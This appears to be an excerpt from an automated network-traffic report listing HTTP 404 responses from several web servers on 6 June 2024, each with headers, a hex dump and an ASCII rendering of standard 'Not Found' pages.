Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:26:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Jun 2024 11:27:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_235166fc167b9a9c3b02d474425d4b16Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Jun 2024 11:27:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_6f2f09a6e780434d0c2716975d904b98Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Jun 2024 11:27:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_4958f8e849f6a9bef174788291989cdeContent-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Jun 2024 11:27:42 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_facf77dc240d3c811795c41071752919Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 06 Jun 2024 11:27:48 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 06 Jun 2024 11:27:50 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Thu, 06 Jun 2024 11:27:53 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Jun 2024 11:28:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
